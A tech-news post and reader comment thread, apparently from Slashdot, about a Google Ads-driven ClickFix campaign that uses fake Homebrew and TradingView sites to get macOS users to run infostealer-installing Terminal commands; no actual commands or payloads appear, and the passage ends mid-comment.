Fake Homebrew Google Ads Push Malware Onto macOS

joshuark shares a report from BleepingComputer: A new malicious campaign is targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms that deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. The campaign employs "ClickFix" techniques where targets are tricked into executing commands in Terminal, infecting themselves with malware. Researchers at threat hunting company Hunt.io identified more than 85 domains impersonating the three platforms in this campaign [...].

When checking some of the domains, BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results. The malicious sites feature convincing download portals for the fake apps and instruct users to copy a curl command in their Terminal to install them, the researchers say. In other cases, like for TradingView, the malicious commands are presented as a "connection security confirmation step." However, if the user clicks on the 'copy' button, a base64-encoded installation command is delivered to the clipboard instead of the displayed Cloudflare verification ID.

Google is the root of all that is evil

[sizzlinkitty]

As subject reads, google is now the root of all that is evil. They've put aside their morals to chase that mighty ad dollar and are willing to advertise for anyone.

Never use terminal to install an app/program....

[bsdetector101]

Some things you learn over time !

Re:

[theNetImp]

so how do I install npm packages I need for development?

Re:

[bsdetector101]

You know they are safe, go for it. Advice was for the idiots.....

Security through obscurity

[Targon]

Apple keeps pushing the IDEA that MacOS is more secure, but it's like living in a house far from other people and leaving the doors unlocked because you don't think anyone will find your house. So, no antivirus, people don't pay attention to security, and then, they get a bit of malware and freak out because their illusions have been shattered.

Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

Re:

[twdorris]

I'm not sure I understand what you're getting at because the weakest link across every OS is the meatbag running the keyboard. This article talks specifically about the delivery mechanism for this involving a dumbass user copy a base64 encoded curl command or some similarly stupid crap and running it. If you give me root because you believe this "security check" is necessary and blindly click OK, then I'm not sure which OS is going to be able to help you out there.

Re:

[Ol Olsoc]

Apple keeps pushing the IDEA that MacOS is more secure, but it's like living in a house far from other people and leaving the doors unlocked because you don't think anyone will find your house. So, no antivirus, people don't pay attention to security, and then, they get a bit of malware and freak out because their illusions have been shattered.

Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

Cool story my man!

Can you tell me where Apple says you shouldn't use an antivirus program? And that Mac users don't need to enable security?

And truth is, your hypothetical security free clueless Mac user should be completely pwned if Apple is just as insecure as Windows is, because they don't use virus checkers, and script blocking.

pssst - we do use security measures, despite the memes. I use several at the same time, for my part.

Re:

[The-Ixian]

Notably, though, disk encryption and firewall are disabled by default on a Mac.

Re:

[drinkypoo]

Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

Have they? It looks mostly like they've been working to make their operating systems shittier. I fucking hate 11. When there's a transient network failure I can't even open an explorer window to C:\ to access my backup local copies. I guess a system I cannot use is potentially secure?

Re:

[ZombieCatInABox]

Tell me you've never even been in the same room with a mac in the past 20 years without telling me. You're simply regurgitating crap you've read on the internet thinking it makes you look smart. Reality check: It doesn't.

MacOS comes configured by default to allow only software from the app store, or software signed by the developper, to be installed. Like TFA says, you must explicitely run terminal commands to allow installation of unsigned applications. The user has to be tricked into doing this, something

Re:

[JustAnotherOldGuy]

Microsoft on the other hand, has been the big target for malware writers, and yep, Microsoft has been working to improve the security of their operating systems.

Well, it's not like they had a choice, did they? They either improved their security or year there wouldn't be a Windows PC left on the planet that would be able to boot to the desktop.

AMOS’ infection chain and delivery

[Mirnotoriety]

AMOS’ infection chain and delivery [trendmicro.com]

‘The infection begins with the attacker gaining initial access to the system through cracked software downloads, which redirect the victim to AMOS’ landing page. The victim is then prompted to click “Download for MacOS” or instructed to copy and paste malicious commands into the Apple Terminal, which then leads to the execution of a malicious installation script.’

What is old is new again

[Ol Olsoc]

FTA: "BleepingComputer discovered that in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results."

Ghosts of Forbes delivering malware in ads after demanding blockers be turned off. Remind me again why we shouldn't use ad blockers?

I don't use a Mac

[Chris Mattern]

It sounds like Homebrew is some specific thing. What is it, since the summary never bothers to explain what it is.

Re:

[drinkypoo]

I haven't used one in a bunch of years (10 or more) but last I looked, Homebrew was a system for installing software.

If you were to search for "Macintosh Homebrew" I bet the top search result would be what you want. I know Google isn't what it used to be, but you have to do your part. Did everyone move on to prompt engineering for LLMs and just plain forget how to do prompt engineering for search engines?

Re:

[JustAnotherOldGuy]

I haven't used one in a bunch of years (10 or more) but last I looked, Homebrew was a system for installing software.

And it certainly did install software, just not the software the users expected to install.

Re:

[CottonThePirate]

Homebrew is a package manager, similar to using "apt get" on a linux box you can "brew install" on a Mac. It will take care of updates, getting dependencies and all that kind of thing. Primarily for command line tools like ffmpeg, htop, iperf, macvim (just for some off my list). There is some curation of the "casks" available to "pour" into your homebew, but just being available via the tool is no promise of security, and you still pass thru the regular macOS gatekeeper so once the signature is known to ap